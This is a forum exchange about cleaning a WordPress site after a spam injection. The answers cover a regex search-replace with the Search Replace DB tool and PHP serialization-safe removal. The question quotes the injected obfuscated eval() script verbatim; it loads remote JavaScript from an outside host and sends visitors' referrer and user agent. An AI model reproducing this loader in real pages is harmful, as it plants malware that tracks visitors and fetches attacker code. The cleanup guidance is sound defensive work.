
Complex Query using special characters

JoeDostie Published in 2018-01-12 22:37:19Z

Hopefully someone may have an easy solution here that I have not thought of, or a tool or something that can help, but I am at a total loss at this point.

I have a website I am working on that was recently hacked with a SPAM injection. Everything is secured now but I am tasked with cleaning up the remains of a script put on each page. The problem I am facing is that there are special characters used throughout the hack and escaping the special characters is proving to be very challenging.

I am also using a Query builder but even that is getting confused.

The code I am trying to remove is this:

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zinsz|var|u0026u|referrer|bhsyf||js|php'.split('|'),0,{}))

As you can see once I start escaping characters I start to get lost. I was wondering if anyone has come across this and found an easier way.

I have successfully gone in and manually deleted the code directly in the database but unfortunately there are about 1006 locations and it just takes forever.

davidreedernst Reply to 2018-01-19 21:46:52Z

Unfortunately, modifying a WordPress database with direct SQL queries can break PHP serialized strings and objects. So even if you come up with the perfect search term, don't do it that way.

Instead, you might try this awesome Search Replace DB tool. Make sure you follow all of their pleas about cautious use of the script, especially: do a backup first, use a very cryptic directory name, and remove the folder as soon as you're done. Also make sure you have php-mbstring running.

The web interface is really nice, but depending on the server setup, it can fail to work. There's also a command line interface, though. To use it, cd into the folder that has the tool. There's documentation for the CLI version in the README.md file. Here's the basic shape of a command to address your case, which you'll need to test and adjust to match your database setup:

php srdb.cli.php --host localhost.or.dbserver --name dbnamehere --user dbuserhere --pass 'dbpasswordhere' --search '/\<noindex\>\<script id\=\"wpinfo\-pst1\".*?<\\/noindex>/s' --replace '' --regex --dry-run

I love this tool's --dry-run feature, which is set in the code above. After you've done lots of dry-runs and are confident you're doing what you intend to do, remove that option from the command line (or uncheck the "dry-run" box if you're in the web interface) and the replace will actually happen. Then, remember, remove the tool so that no one else can use it.
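Added example, not part of the answer above and not code from the Search Replace DB project: it shows why a plain text replace corrupts a PHP serialized value and what a serialization-aware replace does instead. The sample cell and the placeholder payload are constructed, the closing </script></noindex> is assumed from the answer's search pattern, and strip_block and clean_cell are hypothetical helper names.

```php
<?php
// Constructed sample: a placeholder stands in for the packed payload.
const INJECTED = '<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">'
               . '/* placeholder */</script></noindex>';
// Modeled on the answer's --search value; "~" is the delimiter so "/" needs no escaping.
const PATTERN = '~<noindex><script id="wpinfo-pst1".*?</noindex>~s';

// Remove the injected block from every string inside a decoded value.
function strip_block($value)
{
    if (is_string($value)) {
        return preg_replace(PATTERN, '', $value) ?? $value;
    }
    if (is_array($value)) {
        return array_map('strip_block', $value); // keys are preserved
    }
    return $value; // ints, bools, null and incomplete objects are left untouched
}

// Clean one database cell, re-serializing it when it held serialized PHP data.
function clean_cell(string $cell): string
{
    // allowed_classes => false: never instantiate objects read from a compromised DB.
    $decoded = @unserialize($cell, ['allowed_classes' => false]);
    if ($decoded === false && $cell !== serialize(false)) {
        return strip_block($cell);           // plain text column
    }
    return serialize(strip_block($decoded)); // s:N: length prefixes are recomputed
}

$cell = serialize(['title' => 'About', 'text' => 'Hello' . INJECTED]);

// Naive text replace, which is what a raw SQL REPLACE amounts to: the string
// shrinks but its s:N: length prefix does not, so the value no longer decodes.
$naive = preg_replace(PATTERN, '', $cell);
var_dump(@unserialize($naive, ['allowed_classes' => false]));

// Serialization-aware replace: the value still decodes and the block is gone.
var_dump(unserialize(clean_cell($cell), ['allowed_classes' => false]));
```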
